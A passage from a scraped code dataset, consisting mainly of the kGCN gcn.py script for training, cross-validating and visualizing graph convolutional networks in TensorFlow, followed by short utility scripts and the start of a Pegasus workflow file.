continues\")\n\n","repo_name":"Kgee321/Lucky_Unicorn","sub_path":"03_instructions_v1.py","file_name":"03_instructions_v1.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33735278363","text":"import time\nimport json\nimport argparse\nimport importlib\nimport os\nimport sys\n\nimport joblib\nimport numpy as np\nimport sklearn\nfrom sklearn.metrics import average_precision_score, balanced_accuracy_score, matthews_corrcoef, jaccard_score, \\\n roc_curve, auc, accuracy_score, precision_recall_fscore_support\nfrom sklearn.model_selection import KFold, StratifiedKFold\nimport tensorflow as tf\nif tf.__version__.split(\".\")[0]=='2':\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n import tensorflow.compat.v1.logging as logging\nelse:\n import tensorflow.logging as logging\n\nfrom tensorflow.python.framework import graph_util\n\nimport kgcn.layers\nfrom kgcn.data_util import load_and_split_data, load_data, split_data\nfrom kgcn.core import CoreModel\nfrom kgcn.make_plots import plot_cost, plot_auc, plot_r2\nfrom kgcn.make_plots import make_cost_acc_plot\n\n\nclass dotdict(dict):\n \"\"\"dot.notation access to dictionary attributes\"\"\"\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\n def __getstate__(self):\n return self.__dict__\n\n def __setstate__(self, dict):\n self.__dict__ = dict\n\n\nclass NumPyArangeEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.int64):\n return int(obj)\n if isinstance(obj, np.float64):\n return float(obj)\n if isinstance(obj, np.int32):\n return int(obj)\n if isinstance(obj, np.float32):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist() # or map(int, obj)\n return json.JSONEncoder.default(self, obj)\n\n\ndef save_prediction(filename, prediction_data):\n print(f\"[SAVE] {filename}\")\n if os.path.dirname(filename)!=\"\":\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n\n pred = np.array(prediction_data)\n with open(filename, \"w\") as fp:\n if len(pred.shape) == 2:\n # graph-centric mode\n # prediction: graph_num x dist\n 
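# one comma-separated row per graph, e.g. a binary task writes lines like 0.91,0.09\n            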
for dist in pred:\n fp.write(\",\".join(map(str, dist)))\n fp.write(\"\\n\")\n elif len(pred.shape) == 3:\n # node-centric mode\n # prediction: graph_num x node_num x dist\n for node_pred in pred:\n for dist in node_pred:\n fp.write(\",\".join(map(str, dist)))\n fp.write(\"\\n\")\n fp.write(\"\\n\")\n else:\n print(\"[ERROR] unknown prediction format\")\n\n\ndef get_default_config():\n config = {}\n config[\"model.py\"] = \"model\"\n config[\"dataset\"] = \"data.jbl\"\n config[\"validation_dataset\"] = None\n # optimization parameters\n config[\"epoch\"] = 50\n config[\"batch_size\"] = 10\n config[\"patience\"] = 0\n config[\"learning_rate\"] = 0.3\n config[\"validation_data_rate\"] = 0.3\n config[\"shuffle_data\"] = False\n config[\"k-fold_num\"] = 2\n # model parameters\n config[\"with_feature\"] = True\n config[\"with_node_embedding\"] = False\n config[\"embedding_dim\"] = 10\n config[\"normalize_adj_flag\"] = False\n config[\"split_adj_flag\"] = False\n config[\"order\"] = 1\n config[\"param\"] = None\n # model\n config[\"save_interval\"] = 10\n config[\"save_model_path\"] = \"model\"\n # result/info\n # config[\"save_result_train\"]=None\n config[\"save_result_valid\"] = None\n config[\"save_result_test\"] = None\n config[\"save_result_cv\"] = None\n config[\"save_info_train\"] = None\n config[\"save_info_valid\"] = None\n config[\"save_info_test\"] = None\n config[\"save_info_cv\"] = None\n config[\"make_plot\"] = False\n config[\"plot_path\"] = \"./result/\"\n config[\"visualize_path\"] = \"./visualization/\"\n config[\"plot_multitask\"] = False\n config[\"task\"] = \"multitask_classification\"\n config[\"retrain\"] = None\n #\n config[\"profile\"] = False\n config[\"export_model\"] = None\n # for visualization options\n config[\"visualize_kg\"] = None\n\n config[\"stratified_kfold\"] = False\n config[\"prediction_data\"] = None\n\n return config\n\n\ndef load_model_py(model, model_py, is_train=True, feed_embedded_layer=False, batch_size=None):\n pair = model_py.split(\":\")\n sys.path.append(os.getcwd())\n if len(pair) >= 2:\n logging.info(f\"[LOAD] {pair[1]} from {pair[0]}\")\n mod = importlib.import_module(pair[0])\n cls = getattr(mod, pair[1])\n obj = cls()\n if model:\n model.build(obj, is_train, feed_embedded_layer, batch_size)\n return obj\n else:\n logging.info(f\"[LOAD] {pair[0]}\")\n mod = importlib.import_module(pair[0])\n if model:\n model.build(mod, is_train, feed_embedded_layer, batch_size)\n return mod\n\n\ndef print_ckpt(sess, ckpt):\n print(f\"== {ckpt}\")\n for var_name, _ in tf.contrib.framework.list_variables(ckpt):\n var = tf.contrib.framework.load_variable(ckpt, var_name)\n print(var_name, var.shape)\n print(\"==\")\n\n\ndef print_variables():\n print('== neural network')\n vars_em = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n for v in vars_em:\n print(v.name, v.shape)\n print(\"==\")\n\n\ndef compute_metrics(config, info, prediction_data, labels):\n pred_score = np.array(prediction_data)\n true_label = np.array(labels)\n # pred_score: #data x # task x #class\n if len(pred_score.shape) == 1:\n pred_score = pred_score[:, np.newaxis, np.newaxis]\n elif len(pred_score.shape) == 2:\n pred_score = np.expand_dims(pred_score, axis=1)\n logging.info(f\"prediction #data x # task x #class: {pred_score.shape}\")\n # multilabel=True => pred_score: #data x # task x #class\n # multilabel=False => pred_score: #data x # task\n multiclass = False\n ntask = pred_score.shape[1]\n if pred_score.shape[2] == 1: # regression or binary\n pred_score = pred_score[:, :, 0]\n 
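# squeeze (N, tasks, 1) -> (N, tasks): a single output per task, read as a sigmoid/regression score\n        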
logging.info(f\"2-class sigmoid\")\n elif pred_score.shape[2] == 2: # binary\n pred_score = pred_score[:, :, 1]\n logging.info(f\"2-class softmax\")\n elif pred_score.shape[2] > 2:\n multiclass = True\n logging.info(f\"multi-class softmax\")\n # true_label: #data x # task/#class\n if ntask == 1 and len(true_label.shape) == 2 and true_label.shape[1] == 2:\n true_label = true_label[:, 1]\n if len(true_label.shape) == 1:\n true_label = true_label[:, np.newaxis]\n\n logging.info(f\"label #data x # task/#class: {true_label.shape}\")\n if not multiclass:\n logging.info(f\"binary-class mode\")\n v = []\n for i in range(ntask):\n el = {}\n if config[\"task\"] == \"regression\":\n el[\"r2\"] = sklearn.metrics.r2_score(true_label[:, i], pred_score[:, i])\n el[\"mse\"] = sklearn.metrics.mean_squared_error(true_label[:, i], pred_score[:, i])\n elif config[\"task\"] == \"regression_gmfe\":\n el[\"gmfe\"] = np.exp(np.mean(np.log(true_label[:, i]/pred_score[:, i])))\n else:\n pred = np.zeros(pred_score.shape)\n pred[pred_score > 0.5] = 1\n fpr, tpr, _ = roc_curve(true_label[:, i], pred_score[:, i], pos_label=1)\n roc_auc = auc(fpr, tpr)\n ap = average_precision_score(true_label[:, i], pred_score[:, i], pos_label=1)\n acc = accuracy_score(true_label[:, i], pred[:, i])\n scores = precision_recall_fscore_support(true_label[:, i], pred[:, i], average='binary')\n el[\"auc\"] = roc_auc\n el[\"acc\"] = acc\n el[\"ap\"] = ap\n el[\"pre\"] = scores[0]\n el[\"rec\"] = scores[1]\n el[\"f\"] = scores[2]\n el[\"sup\"] = scores[3]\n el[\"balanced_acc\"] = balanced_accuracy_score(true_label[:, i], pred[:, i])\n el[\"mcc\"] = matthews_corrcoef(true_label[:, i], pred[:, i])\n try:\n el[\"jaccard\"] = jaccard_score(true_label[:, i], pred[:, i])\n except:\n pass\n v.append(el)\n else: # multiclass=True\n # #data x # task x #class\n # limitation: #task=1\n logging.info(f\"multi-class mode\")\n pred = np.argmax(pred_score, axis=-1)\n true_label = np.argmax(true_label, axis=-1)\n pred = pred[:, 0]\n nclass = pred_score.shape[2]\n v = []\n for i in range(ntask):\n el = {}\n acc = accuracy_score(true_label, pred)\n scores = precision_recall_fscore_support(true_label, pred, labels=list(range(nclass)), average=None)\n el[\"acc\"] = acc\n el[\"pre\"] = scores[0]\n el[\"rec\"] = scores[1]\n el[\"f\"] = scores[2]\n el[\"sup\"] = scores[3]\n el[\"balanced_acc\"] = balanced_accuracy_score(true_label, pred)\n el[\"mcc\"] = matthews_corrcoef(true_label, pred)\n try:\n el[\"jaccard\"] = jaccard_score(true_label, pred)\n except:\n pass\n v.append(el)\n return v\n\n\ndef train(sess, graph, config):\n if config[\"validation_dataset\"] is None:\n _, train_data, valid_data, info = load_and_split_data(config, filename=config[\"dataset\"],\n valid_data_rate=config[\"validation_data_rate\"])\n else:\n print(\"[INFO] training\")\n train_data, info = load_data(config, filename=config[\"dataset\"])\n print(\"[INFO] validation\")\n valid_data, valid_info = load_data(config, filename=config[\"validation_dataset\"])\n info[\"graph_node_num\"] = max(info[\"graph_node_num\"], valid_info[\"graph_node_num\"])\n info[\"graph_num\"] = info[\"graph_num\"] + valid_info[\"graph_num\"]\n\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"])\n\n metric_name = (\"mse\" if config[\"task\"] == \"regression\" else\n \"gmfe\" if config[\"task\"] == \"regression_gmfe\" else\n \"accuracy\")\n\n if config[\"profile\"]:\n vars_to_train = tf.trainable_variables()\n print(vars_to_train)\n\n # Training\n start_t = time.time()\n 
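# wall-clock timing around the whole fit() call, reported below in seconds\n    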
model.fit(train_data, valid_data)\n train_time = time.time() - start_t\n print(f\"training time: {train_time}[sec]\")\n if valid_data.num > 0:\n # Validation\n start_t = time.time()\n valid_cost, valid_metrics, prediction_data = model.pred_and_eval(valid_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {valid_cost}\\n\"\n f\"{metric_name} = {valid_metrics[metric_name]}\\n\"\n f\"validation time: {infer_time}[sec]\\n\")\n # Saving\n if config[\"save_info_valid\"] is not None:\n result = {}\n result[\"validation_cost\"] = valid_cost\n result[\"validation_accuracy\"] = valid_metrics\n result[\"train_time\"] = train_time\n result[\"infer_time\"] = infer_time\n if config[\"task\"]!=\"link_prediction\":\n result[\"valid_metrics\"] = compute_metrics(config, info, prediction_data, valid_data.labels)\n ##\n save_path = config[\"save_info_valid\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4, cls=NumPyArangeEncoder)\n ##\n if config[\"save_info_train\"] is not None:\n fold_data = dotdict({})\n fold_data.valid_acc = valid_metrics[metric_name]\n if config[\"task\"] == \"regression\":\n fold_data.training_mse = [el[\"training_mse\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_mse\"] for el in model.validation_metrics_list]\n elif config[\"task\"] == \"regression_gmfe\":\n fold_data.training_mse = [el[\"training_gmfe\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_gmfe\"] for el in model.validation_metrics_list]\n else:\n fold_data.training_acc = [el[\"training_accuracy\"] for el in model.training_metrics_list]\n fold_data.validation_acc = [el[\"validation_accuracy\"] for el in model.validation_metrics_list]\n fold_data.training_cost = model.training_cost_list\n fold_data.validation_cost = model.validation_cost_list\n fold_data.train_time = train_time\n fold_data.infer_time = infer_time\n save_path = config[\"save_info_train\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(fold_data, fp, indent=4, cls=NumPyArangeEncoder)\n ##\n\n\n if config[\"export_model\"]:\n try:\n print(f\"[SAVE] {config['export_model']}\")\n graph_def = graph_util.convert_variables_to_constants(sess, graph.as_graph_def(), ['output'])\n tf.train.write_graph(graph_def, '.', config[\"export_model\"], as_text=False)\n except:\n print('[ERROR] output has been not found')\n if config[\"save_result_valid\"] is not None:\n filename = config[\"save_result_valid\"]\n save_prediction(filename, prediction_data)\n if config[\"make_plot\"]:\n if config[\"task\"] == \"regression\" or config[\"task\"] == \"regression_gmfe\":\n # plot_cost(config, valid_data, model)\n plot_r2(config, valid_data.labels, np.array(prediction_data))\n elif config[\"task\"]==\"link_prediction\":\n plot_cost(config, valid_data, model)\n else:\n plot_cost(config, valid_data, model)\n plot_auc(config, valid_data.labels, np.array(prediction_data))\n\ndef train_cv(sess, graph, config):\n all_data, info = load_data(config, filename=config[\"dataset\"], prohibit_shuffle=True) # shuffle is done by KFold\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"])\n # Training\n if config[\"stratified_kfold\"]:\n print(\"[INFO] use stratified K-fold\")\n kf = StratifiedKFold(n_splits=config[\"k-fold_num\"], shuffle=config[\"shuffle_data\"], 
random_state=123)\n else:\n kf = KFold(n_splits=config[\"k-fold_num\"], shuffle=config[\"shuffle_data\"], random_state=123)\n\n kf_count = 1\n fold_data_list = []\n output_data_list = []\n if all_data[\"labels\"] is not None:\n split_base = all_data[\"labels\"]\n else:\n split_base = all_data[\"label_list\"][0]\n if config[\"stratified_kfold\"]:\n split_base = np.argmax(split_base, axis=1)\n score_metrics = []\n if config[\"task\"] == \"regression\":\n metric_name = \"mse\"\n elif config[\"task\"] == \"regression_gmfe\":\n metric_name = \"gmfe\"\n else:\n metric_name = \"accuracy\"\n split_data_generator = kf.split(split_base, split_base) if config[\"stratified_kfold\"] else kf.split(split_base)\n for train_valid_list, test_list in split_data_generator:\n print(f\"starting fold: {kf_count}\")\n train_valid_data, test_data = split_data(all_data,\n indices_for_train_data=train_valid_list,\n indices_for_valid_data=test_list)\n\n train_data, valid_data = split_data(train_valid_data, valid_data_rate=config[\"validation_data_rate\"])\n # Training\n print(train_valid_list)\n print(test_list)\n start_t = time.time()\n model.fit(train_data, valid_data, k_fold_num=kf_count)\n train_time = time.time() - start_t\n print(f\"training time: {train_time}[sec]\")\n # Test\n print(\"== valid data ==\")\n start_t = time.time()\n valid_cost, valid_metrics, prediction_data = model.pred_and_eval(valid_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {valid_cost}\\n\"\n f\"{metric_name} = {valid_metrics[metric_name]}\\n\"\n f\"infer time: {infer_time}[sec]\\n\")\n print(\"== test data ==\")\n start_t = time.time()\n test_cost, test_metrics, prediction_data = model.pred_and_eval(test_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {test_cost}\\n\"\n f\"{metric_name} = {test_metrics[metric_name]}\\n\")\n score_metrics.append(test_metrics[metric_name])\n print(f\"infer time: {infer_time}[sec]\")\n\n if config[\"export_model\"]:\n try:\n name, ext = os.path.splitext(config[\"export_model\"])\n filename = name+\".\"+str(kf_count)+ext\n print(f\"[SAVE] {filename}\")\n graph_def = graph_util.convert_variables_to_constants(sess, graph.as_graph_def(), ['output'])\n tf.train.write_graph(graph_def, '.', filename, as_text=False)\n except:\n print('[ERROR] output has been not found')\n if \"save_edge_result_cv\" in config:\n output_data = model.output(test_data)\n output_data_list.append(output_data)\n # save fold data\n fold_data = dotdict({})\n fold_data.prediction_data = prediction_data\n if all_data[\"labels\"] is not None:\n fold_data.test_labels = test_data.labels\n else:\n fold_data.test_labels = test_data.label_list\n fold_data.test_data_idx = test_list\n if config[\"task\"] == \"regression\":\n fold_data.training_mse = [el[\"training_mse\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_mse\"] for el in model.validation_metrics_list]\n elif config[\"task\"] == \"regression_gmfe\":\n fold_data.training_mse = [el[\"training_gmfe\"] for el in model.training_metrics_list]\n fold_data.validation_mse = [el[\"validation_gmfe\"] for el in model.validation_metrics_list]\n else:\n fold_data.training_acc = [el[\"training_accuracy\"] for el in model.training_metrics_list]\n fold_data.validation_acc = [el[\"validation_accuracy\"] for el in model.validation_metrics_list]\n fold_data.test_acc = test_metrics[metric_name]\n fold_data.training_cost = model.training_cost_list\n fold_data.validation_cost = model.validation_cost_list\n fold_data.test_cost = 
test_cost\n fold_data.train_time = train_time\n fold_data.infer_time = infer_time\n fold_data_list.append(fold_data)\n kf_count += 1\n\n print(f\"cv {metric_name}(mean) = {np.mean(score_metrics)}\\n\"\n f\"cv {metric_name}(std.) = {np.std(score_metrics)}\\n\")\n if \"save_info_cv\" in config and config[\"save_info_cv\"] is not None:\n save_path = config[\"save_info_cv\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n _, ext = os.path.splitext(save_path)\n if ext == \".json\":\n with open(save_path, \"w\") as fp:\n json.dump(fold_data_list, fp, indent=4, cls=NumPyArangeEncoder)\n else:\n joblib.dump(fold_data_list, save_path, compress=True)\n #\n if \"save_edge_result_cv\" in config and config[\"save_edge_result_cv\"] is not None:\n result_cv = []\n for j, fold_data in enumerate(fold_data_list):\n pred_score = np.array(fold_data.prediction_data)\n true_label = np.array(fold_data.test_labels)\n test_idx = fold_data.test_data_idx\n score_list = []\n for pair in true_label[0]:\n i1, _, j1, i2, _, j2 = pair\n s1 = pred_score[0, i1, j1]\n s2 = pred_score[0, i2, j2]\n score_list.append([s1, s2])\n fold = {}\n fold[\"output\"] = output_data_list[j][0]\n fold[\"score\"] = np.array(score_list)\n fold[\"test_data_idx\"] = test_idx\n result_cv.append(fold)\n save_path = config[\"save_edge_result_cv\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n _, ext = os.path.splitext(save_path)\n if ext == \".json\":\n with open(save_path, \"w\") as fp:\n json.dump(result_cv, fp, indent=4, cls=NumPyArangeEncoder)\n else:\n joblib.dump(result_cv, save_path, compress=True)\n #\n if \"save_result_cv\" in config and config[\"save_result_cv\"] is not None:\n result_cv = []\n for j, fold_data in enumerate(fold_data_list):\n v = compute_metrics(config, info, fold_data.prediction_data, fold_data.test_labels)\n result_cv.append(v)\n save_path = config[\"save_result_cv\"]\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result_cv, fp, indent=4, cls=NumPyArangeEncoder)\n #\n for i, fold_data in enumerate(fold_data_list):\n prefix = \"fold\"+str(i)+\"_\"\n result_path = config[\"plot_path\"]\n os.makedirs(result_path, exist_ok=True)\n if config[\"make_plot\"]:\n if config[\"task\"] == \"regression\":\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_mse, fold_data.validation_mse, result_path,prefix=prefix)\n pred_score = np.array(fold_data.prediction_data)\n plot_r2(config, fold_data.test_labels, pred_score, prefix=prefix)\n elif config[\"task\"] == \"regression_gmfe\":\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_mse, fold_data.validation_mse, result_path,prefix=prefix)\n pred_score = np.array(fold_data.prediction_data)\n plot_r2(config, fold_data.test_labels, pred_score, prefix=prefix)\n elif config[\"task\"] == \"link_prediction\":\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_acc, fold_data.validation_acc, result_path,prefix=prefix)\n else:\n make_cost_acc_plot(fold_data.training_cost, fold_data.validation_cost,\n fold_data.training_acc, fold_data.validation_acc, result_path,prefix=prefix)\n pred_score = np.array(fold_data.prediction_data)\n plot_auc(config, fold_data.test_labels, pred_score, prefix=prefix)\n\n\ndef infer(sess, graph, config):\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = 
config[\"dataset_test\"]\n if \"test_label_list\" in config:\n config[\"label_list\"]=config[\"test_label_list\"]\n all_data, info = load_data(config, filename=dataset_filename, prohibit_shuffle=True, test_mode=True)\n\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"], is_train=False)\n\n metric_name = (\"mse\" if config[\"task\"] == \"regression\" else\n \"gmfe\" if config[\"task\"] == \"regression_gmfe\" else\n \"accuracy\")\n\n # Initialize session\n restore_ckpt(sess, config[\"load_model\"])\n\n # Validation\n start_t = time.time()\n test_cost, test_metrics, prediction_data = model.pred_and_eval(all_data)\n infer_time = time.time() - start_t\n print(f\"final cost = {test_cost}\\n\"\n f\"{metric_name} = {test_metrics[metric_name]}\\n\"\n f\"infer time: {infer_time}[sec]\\n\")\n\n if config[\"save_info_test\"] is not None:\n result = {}\n result[\"test_cost\"] = test_cost\n result[\"test_accuracy\"] = test_metrics\n result[\"infer_time\"] = infer_time\n if config[\"task\"]!=\"link_prediction\":\n result[\"test_metrics\"] = compute_metrics(config, info, prediction_data, all_data.labels)\n save_path = config[\"save_info_test\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4, cls=NumPyArangeEncoder)\n\n if config[\"save_result_test\"] is not None:\n filename = config[\"save_result_test\"]\n save_prediction(filename, prediction_data)\n if config[\"make_plot\"]:\n if config[\"task\"] == \"regression\":\n pred_score = np.array(prediction_data)\n plot_r2(config, all_data.labels, pred_score)\n elif config[\"task\"] == \"regression_gmfe\":\n pred_score = np.array(prediction_data)\n plot_r2(config, all_data.labels, pred_score)\n elif config[\"task\"] == \"link_prediction\":\n pass\n else:\n plot_auc(config, all_data.labels, np.array(prediction_data))\n \n if \"save_edge_result_test\" in config and config[\"save_edge_result_test\"] is not None:\n #output_left_pred = model.left_pred(all_data)\n #print(output_left_pred.shape)\n ##\n output_data = model.output(all_data)\n pred_score = np.array(prediction_data)\n true_label = np.array(all_data.label_list)\n score_list = []\n print(true_label.shape)\n for pair in true_label[0]:\n if len(prediction_data[0].shape)==2:\n i1, _, j1, i2, _, j2 = pair\n s1 = pred_score[0, i1, j1]\n s2 = pred_score[0, i2, j2]\n elif len(prediction_data[0].shape)==3:\n i1, r1, j1, i2, r2, j2 = pair\n s1 = pred_score[0, r1, i1, j1]\n s2 = pred_score[0, r2, i2, j2]\n score_list.append([s1, s2])\n fold = {}\n fold[\"output\"] = output_data[0]\n fold[\"score\"] = np.array(score_list)\n save_path = config[\"save_edge_result_test\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n _, ext = os.path.splitext(save_path)\n if ext == \".json\":\n with open(save_path, \"w\") as fp:\n json.dump(fold, fp, indent=4, cls=NumPyArangeEncoder)\n else:\n joblib.dump(fold, save_path, compress=True)\n\n if config[\"prediction_data\"] is not None:\n obj = {}\n pred_score = np.array(prediction_data)\n obj[\"prediction_data\"] = pred_score\n # obj[\"labels\"] = all_data.labels\n save_path = config[\"prediction_data\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n joblib.dump(obj, config[\"prediction_data\"], compress=True)\n\n\ndef restore_ckpt(sess, ckpt):\n saver = tf.train.Saver()\n logging.info(f\"[LOAD]{ckpt}\")\n try:\n saver.restore(sess, ckpt)\n except:\n 
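# note: the bare except above also swallows KeyboardInterrupt; tf.errors.NotFoundError would be a narrower catch for a missing checkpoint\n        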
print(\"======LOAD ERROR======\")\n print_variables()\n print_ckpt(sess, ckpt)\n raise Exception\n return saver\n\n\ndef visualize(sess, config, args):\n from kgcn.visualization import cal_feature_IG, cal_feature_IG_for_kg\n # input a molecule at a time\n batch_size = 1\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n all_data, info = load_data(config, filename=dataset_filename, prohibit_shuffle=True)\n\n model = CoreModel(sess, config, info)\n load_model_py(model, config[\"model.py\"], is_train=False, feed_embedded_layer=True, batch_size=batch_size)\n placeholders = model.placeholders\n restore_ckpt(sess, config['load_model'])\n # calculate integrated gradients\n if config['visualize_type'] == 'graph':\n cal_feature_IG(sess, all_data, placeholders, info, config, model.prediction,\n args.ig_modal_target, args.ig_label_target,\n logger=logging, model=model.nn, args=args)\n else:\n cal_feature_IG_for_kg(sess, all_data, placeholders, info, config, model.prediction,\n logger=logging, model=model.nn, args=args)\n\n\ndef main():\n seed = 1234\n np.random.seed(seed)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('mode', type=str,\n help='train/infer/train_cv/visualize')\n parser.add_argument('--config', type=str, default=None, nargs='?',\n help='config json file')\n parser.add_argument('--save-config', default=None, nargs='?',\n help='save config json file')\n parser.add_argument('--retrain', type=str, default=None,\n help='retrain from checkpoint')\n parser.add_argument('--no-config', action='store_true',\n help='use default setting')\n parser.add_argument('--model', type=str, default=None,\n help='model')\n parser.add_argument('--dataset', type=str, default=None,\n help='dataset')\n parser.add_argument('--gpu', type=str, default=None,\n help='constraint gpus (default: all) (e.g. --gpu 0,2)')\n parser.add_argument('--cpu', action='store_true',\n help='cpu mode (calcuration only with cpu)')\n parser.add_argument('--bspmm', action='store_true',\n help='bspmm')\n parser.add_argument('--bconv', action='store_true',\n help='bconv')\n parser.add_argument('--batched', action='store_true',\n help='batched')\n parser.add_argument('--profile', action='store_true',\n help='')\n parser.add_argument('--skfold', action='store_true',\n help='stratified k-fold')\n parser.add_argument('--param', type=str, default=None,\n help='parameter')\n parser.add_argument('--ig_targets', type=str, default='all',\n choices=['all', 'profeat', 'features', 'adjs', 'dragon','embedded_layer'],\n help='[deplicated (use ig_modal_target)]set scaling targets for Integrated Gradients')\n parser.add_argument('--ig_modal_target', type=str, default='all',\n choices=['all', 'profeat', 'features', 'adjs', 'dragon','embedded_layer'],\n help='set scaling targets for Integrated Gradients')\n parser.add_argument('--ig_label_target', type=str, default='max',\n help='[visualization mode only] max/all/(label index)')\n parser.add_argument('--visualize_type', type=str, default='graph',\n choices=['graph', 'node', 'edge_loss', 'edge_score'],\n help=\"graph: visualize graph's property. node: create an integrated gradients map\"\n \" using target node. edge_loss: create an integrated gradients map\"\n \" using target edge and loss function. edge_score: create an integrated gradients map\"\n \" using target edge and score function.\")\n parser.add_argument('--visualize_target', type=int, default=None,\n help=\"set the target's number you want to visualize. 
from: [0, ~)\")\n parser.add_argument('--visualize_resample_num', type=int, default=None,\n help=\"resampling for visualization: [0, ~v)\")\n parser.add_argument('--visualize_method', type=str, default='ig',\n choices=['ig', 'grad', 'grad_prod', 'smooth_grad', 'smooth_ig'],\n help=\"visualization methods\")\n parser.add_argument('--graph_distance', type=int, default=1,\n help=(\"set the distance from target node. An output graph is created within \"\n \"the distance from target node. :[1, ~)\"))\n parser.add_argument('--verbose', action=\"store_true\",\n help=\"set log level\")\n parser.add_argument('--visualization_header', type=str, default=None,\n help=\"filename header of visualization\")\n\n args = parser.parse_args()\n if args.verbose:\n logging.set_verbosity(logging.DEBUG)\n else:\n logging.set_verbosity(logging.WARN)\n\n # config\n config = get_default_config()\n if args.config is None:\n pass\n else:\n print(f\"[LOAD] {args.config}\")\n with open(args.config, \"r\") as fp:\n config.update(json.load(fp))\n # option\n if args.model is not None:\n config[\"load_model\"] = args.model\n if args.dataset is not None:\n config[\"dataset\"] = args.dataset\n # param\n if args.param is not None:\n config[\"param\"] = args.param\n # option\n if args.retrain is not None:\n config[\"retrain\"] = args.retrain\n # gpu/cpu\n if args.cpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n elif args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n #\n if args.profile:\n config[\"profile\"] = True\n if args.skfold is not None:\n config[\"stratified_kfold\"] = args.skfold\n # bspmm\n # if args.disable_bspmm:\n # print(\"[INFO] disabled bspmm\")\n # else:\n kgcn.layers.load_bspmm(args)\n # print(\"[INFO] enabled bspmm\")\n # depricated options\n if args.ig_targets != \"all\":\n args.ig_modal_target = args.ig_targets\n # setup\n\n config[\"visualize_type\"] = args.visualize_type\n config[\"visualize_target\"] = args.visualize_target\n config[\"graph_distance\"] = args.graph_distance\n\n with tf.Graph().as_default() as graph:\n seed = 1234\n tf.set_random_seed(seed)\n with tf.Session(config=tf.ConfigProto(log_device_placement=False,\n gpu_options=tf.GPUOptions(allow_growth=True))) as sess:\n # mode\n config[\"mode\"] = args.mode\n if args.mode == \"train\":\n train(sess, graph, config)\n if args.mode == \"train_cv\":\n train_cv(sess, graph, config)\n elif args.mode == \"infer\" or args.mode == \"predict\":\n infer(sess, graph, config)\n elif args.mode == \"visualize\":\n visualize(sess, config, args)\n if args.save_config is not None:\n print(f\"[SAVE] {args.save_config}\")\n os.makedirs(os.path.dirname(args.save_config), exist_ok=True)\n with open(args.save_config, \"w\") as fp:\n json.dump(config, fp, indent=4, cls=NumPyArangeEncoder)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clinfo/kGCN","sub_path":"gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":34001,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"4232738427","text":"accessions = []\nfor line in open('catA-v3.accessions.txt'):\n accessions += [line.strip()]\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\nbatches = 500\n\nfor chunk in chunks(accessions,batches):\n print(','.join(chunk))\n 
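# a blank line terminates each batch of up to 500 accessions in the output\n    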
print()\n","repo_name":"serratus-bio/serratus-batch-assembly","sub_path":"stats/run_selector_splitter.py","file_name":"run_selector_splitter.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34797933460","text":"from counter import Counter\n\nc1 = Counter()\nc2 = Counter()\nc3 = Counter(10)\n\nc1.increment()\nc1.increment()\nc2.increment()\nc3.decrement()\n# c1.resep()\n\nc1.count=10\nn = c1.count\n\nprint(c1)\nprint(c2)\nprint(c3)","repo_name":"Viktarios/lesson23","sub_path":"lesson27/task01.py","file_name":"task01.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11959685328","text":"#!/usr/bin/env python3\n\nimport os\nfrom pathlib import Path\nfrom argparse import ArgumentParser\n\nfrom Pegasus.api import *\n\nclass CoconetWorkflow():\n wf = None\n sc = None\n tc = None\n rc = None\n props = None\n\n dagfile = None\n wf_name = 